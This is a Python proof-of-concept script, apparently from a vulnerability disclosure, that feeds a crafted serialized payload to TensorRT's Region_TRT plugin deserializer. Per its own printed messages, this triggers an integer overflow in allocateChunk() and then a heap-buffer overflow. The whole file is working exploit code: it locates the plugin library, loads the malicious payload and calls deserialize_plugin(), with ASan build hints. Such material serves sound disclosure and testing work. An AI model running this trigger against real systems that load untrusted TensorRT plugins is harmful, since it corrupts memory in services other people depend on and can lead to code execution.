File size: 4,621 Bytes
398500f
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
#!/usr/bin/env python3
"""
Trigger TensorRT Region plugin heap overflow via deserialize_plugin().

This script loads a malicious serialized payload and feeds it to
RegionPluginCreator.deserialize_plugin(), which internally calls
Region::Region(buffer, length) — the vulnerable deserialization constructor.

Requirements:
  - TensorRT Python package (pip install tensorrt)
  - TensorRT OSS plugin library (libnvinfer_plugin.so) built from source
    https://github.com/NVIDIA/TensorRT

For ASan detection, build the OSS plugins with:
  cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address"
  make -j$(nproc) nvinfer_plugin

Usage:
  python3 gen_payload.py           # generates malicious_region_payload.bin
  python3 trigger_deserialize.py   # triggers the heap overflow
"""
import ctypes
import struct
import sys
import os
import glob

def find_and_load_plugin_lib():
    """Locate libnvinfer_plugin.so and return its path, or None if absent.

    Despite the name, nothing is loaded here; the caller loads the returned
    path. Candidates are tried in a fixed order:

    1. a relative OSS build output directory (relative to the current
       working directory),
    2. a Colab-style OSS build location,
    3. the system library directory used by the Docker image,
    4. each non-empty entry of ``LD_LIBRARY_PATH``, in order.

    Each candidate is expanded with ``glob.glob``, and the first existing
    match wins.
    """
    candidates = [
        # Built from TensorRT OSS source
        "TensorRT/build/out/libnvinfer_plugin.so",
        "/content/TRT/build/out/libnvinfer_plugin.so",
        # Docker container
        "/usr/lib/x86_64-linux-gnu/libnvinfer_plugin.so",
    ]

    # Empty segments (e.g. from "::" or a trailing ":") are skipped.
    ld_dirs = os.environ.get("LD_LIBRARY_PATH", "").split(":")
    candidates.extend(
        os.path.join(directory, "libnvinfer_plugin.so")
        for directory in ld_dirs
        if directory
    )

    # Lazily walk every glob match of every candidate; stop at the first hit.
    existing = (
        hit
        for pattern in candidates
        for hit in glob.glob(pattern)
        if os.path.exists(hit)
    )
    return next(existing, None)

def main():
    """Hand a serialized Region_TRT payload to the plugin creator's deserializer.

    The payload path is ``malicious_region_payload.bin`` unless the first
    command-line argument overrides it. The process exits with status 1 when
    any of these holds:

    - the payload file does not exist,
    - the ``tensorrt`` package cannot be imported,
    - no ``Region_TRT`` creator is present in the plugin registry.

    An exception raised by ``deserialize_plugin`` is printed, not propagated.
    """
    cli_args = sys.argv[1:]
    payload_file = cli_args[0] if cli_args else "malicious_region_payload.bin"

    if not os.path.exists(payload_file):
        print(f"[-] {payload_file} not found. Run gen_payload.py first.")
        sys.exit(1)

    with open(payload_file, "rb") as fh:
        payload = fh.read()
    print(f"[+] Loaded {payload_file}: {len(payload)} bytes")

    # Imported here rather than at module top so a missing package produces a
    # readable message instead of an import-time traceback.
    try:
        import tensorrt as trt
        print(f"[+] TensorRT {trt.__version__}")
    except ImportError:
        print("[-] TensorRT Python package not found. Install with: pip install tensorrt")
        sys.exit(1)

    # Prefer an OSS-built plugin library (the source of Region_TRT).
    # RTLD_GLOBAL exposes its symbols to libraries loaded afterwards. The
    # initLibNvInferPlugins(None, b'') call presumably registers the library's
    # creators with a null logger and empty namespace — confirm against the
    # TensorRT version in use.
    plugin_path = find_and_load_plugin_lib()
    if not plugin_path:
        print("[!] OSS plugin library not found, trying default registry...")
    else:
        print(f"[+] Loading plugin lib: {plugin_path}")
        plugin_lib = ctypes.CDLL(plugin_path, mode=ctypes.RTLD_GLOBAL)
        plugin_lib.initLibNvInferPlugins(None, b'')

    # The first creator whose name matches wins.
    registry = trt.get_plugin_registry()
    region_creator = next(
        (creator for creator in registry.all_creators if creator.name == "Region_TRT"),
        None,
    )

    if not region_creator:
        for hint in (
            "[-] Region_TRT plugin not found in registry.",
            "    Build TensorRT OSS plugins first:",
            "    git clone https://github.com/NVIDIA/TensorRT.git",
            "    cd TensorRT && mkdir build && cd build",
            "    cmake .. -DBUILD_PARSERS=OFF -DBUILD_SAMPLES=OFF",
            "    make -j$(nproc) nvinfer_plugin",
        ):
            print(hint)
        sys.exit(1)

    print(f"[+] Region_TRT v{region_creator.plugin_version}")

    # Decode the leading header purely for display; nothing below reads these
    # values. Layout as read here: six little-endian int32 fields, then flag
    # bytes at offsets 24 and 25, then an int32 at offset 32.
    if len(payload) >= 32:
        c, h, w, num, classes, coords = struct.unpack_from("<6i", payload, 0)
        print(f"[*] Payload header: C={c} H={h} W={w} num={num} classes={classes} coords={coords}")
        print(f"[*] Flags: softmaxTree={payload[24]} leaf={payload[25]}")
        if len(payload) >= 36:
            (n_val,) = struct.unpack_from("<i", payload, 32)
            # Low 32 bits of n * 4, i.e. what a 32-bit multiply would produce.
            wrapped = (n_val * 4) & 0xFFFFFFFF
            print(f"[*] smTreeTemp->n = {n_val} (0x{n_val & 0xFFFFFFFF:08x})")
            print(f"[*] malloc will compute: {n_val} * 4 = {n_val * 4} -> 0x{wrapped:08x} (truncated)")

    print()
    print("[!] Calling RegionPluginCreator.deserialize_plugin() with malicious data...")
    print("[!] This triggers Region::Region(buffer, length) -> allocateChunk() integer overflow")
    print("[!] Expected: heap-buffer-overflow (visible with ASan)")
    print()

    try:
        result = region_creator.deserialize_plugin("region", payload)
        print(f"[+] Plugin deserialized (returned: {result})")
        print("[!] Without ASan, the heap overflow is silent but corruption has occurred.")
        print("[!] Build libnvinfer_plugin.so with -fsanitize=address to see the crash.")
    except Exception as exc:
        # Reported, not re-raised: the script still exits normally here.
        print(f"[!] Exception during deserialization: {exc}")


if __name__ == "__main__":
    main()